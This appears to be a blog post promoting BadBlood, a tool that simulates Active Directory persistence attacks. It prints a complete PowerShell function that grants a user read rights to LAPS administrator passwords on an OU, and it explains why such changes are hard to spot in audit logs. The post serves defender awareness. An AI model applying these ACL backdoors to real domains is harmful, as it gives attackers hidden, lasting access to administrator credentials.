Persistence is a standard method for attackers to keep their toes inside a target computer system. “Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.” Source

"Permissions applied in milliseconds?" What's that mean for an environment that's experienced a compromise?

Any security device or security system has unique ways attackers apply persistence to remain in control. Attackers use this persistence to allow themselves to return to the system and keep administrative privileges.

I designed the first release of BadBlood to simulate random Active Directory persistence attacks. Some attacks applied in the first release include

LAPS read access Serviceprincipalname controlDerivative domain admin Dssync privileges GPO permission delegation

If you decide to test BadBlood, you might choose to run the full domain import, or you might choose to run just a segment of the tool. If you run all the scripts, notice that the full creation of the domain, the OUs, users, groups, computers, permissions, and grouping, takes 30 minutes+. If you decide to test only the part of the script that applies permissions, you'll notice the permissions apply in seconds.

"Permissions applied in seconds." What does that mean to an environment that's had a compromise?

An attacker can implant a method of persistence in an active directory in a matter of seconds.

If you are breached and you know the attacker gained access to a highly privileged group, the attacker may have implanted a subversive method to hide in your domain even if the attacker only had access for minutes.

BadBlood currently applies persistence attacks randomly. Random users get random permissions on random OUs. If I was an attacker, I could apply any of these persistence attacks to a domain in under 10 seconds.

My last few posts are on LAPS, so I'll start by simulating a LAPS Persistence Attack

I can add LAPS permissions into the domain in under one second. Literally 396 milliseconds. Attackers can have a backdoor into your domain in under 400 ***MILLI***iseconds! Thats 4/10ths of a second!

"But the attacker was only in my system for 4 minutes! It's ok!"

Is it?... Is it really. I can add a smorgasbord of backdoors in 4 minutes.

Boomsauce Below:

function ApplyPersistenceLAPS {

## Create guidmap for acl functions

cd ad:

#================

#Get a reference to the RootDSE of the current domain

$schemaPath = (Get-ADRootDSE)

#Get a reference to the current domain

$domain = Get-ADDomain

#============================

#Create a hashtable to store the GUID value of each schema class and attribute

$guidmap = @{ }

Get-ADObject -SearchBase ($schemaPath.SchemaNamingContext) -LDAPFilter `

"(schemaidguid=*)" -Properties lDAPDisplayName, schemaIDGUID |

% { $guidmap[$_.lDAPDisplayName] = [System.GUID]$_.schemaIDGUID }

#Create a hashtable to store the GUID value of each extended right in the forest

$extendedrightsmap = @{ }

Get-ADObject -SearchBase ($schemaPath.ConfigurationNamingContext) -LDAPFilter `

"(&(objectclass=controlAccessRight)(rightsguid=*))" -Properties displayName, rightsGuid |

% { $extendedrightsmap[$_.displayName] = [System.GUID]$_.rightsGuid }

Function ReadComputerAdmPwd($objGroup, $objOU, $inheritanceType)

{

$error.Clear()

$groupSID = New-Object System.Security.Principal.SecurityIdentifier $objGroup.SID

$objAcl = get-acl $objOU

$objAcl.AddAccessRule((New-Object System.DirectoryServices.ActiveDirectoryAccessRule $groupSID, "ReadProperty", "Allow", $guidmap["ms-Mcs-AdmPwd"], $inheritanceType, $guidmap["computer"]))

$objAcl.AddAccessRule((New-Object System.DirectoryServices.ActiveDirectoryAccessRule $groupSID, "ExtendedRight", "Allow", $inheritanceType, $guidmap["computer"]))

try

{

Set-Acl -AclObject $objAcl -path $objOU

}

catch

{

Write-Host -ForegroundColor Red ("ERROR: Unable to grant the group " + $objGroup.Name + " permissions to read local administrator password on OU" + $objOU)

}

If (!$error)

{

Write-Host -ForegroundColor Green ("INFORMATION: Granted the group " + $objGroup.Name + " permissions to read local administrator password on OU " + $objOU)

}

}

$user = Get-aduser lillie_gardner

$ou = Get-ADOrganizationalUnit 'OU=TEMP,OU=LAPS Testing,DC=badblood,DC=com'

$in = 'Descendents'

ReadcomputerAdmPwd -objGroup $user -objOU $ou -inheritanceType $in

}

ApplyPersistenceLAPS

Simply because this code may be new to you, doesn't mean the code isn’t already in the hands of well funded attackers.

Is not as simple to reverse the effects of an attacker. If you happen to have AD auditing on, and if you happen to audit permission changes on all sub OUs, guide here, searching for these events in real time or post incident is a bit mundane and tiresome.

There are no specific permissions identified in the alert. The record shows a very generic event.

Category: Directory Service Changes Description: A directory service object was modified.

Here is a generating event on the DC - Download link - Embeded Txt Below

Good luck finding useful information quickly from this text blog

I’ll dive into additional persistence attacks in later posts, and help push you to identify, eradicate, and block these attacks from happening in your Active Directory. For more information on identifying legacy permission snafus, or to obtain training tailored to your Active Directory environment, please see my services page or reach out to me to get an understanding of the training services I provide.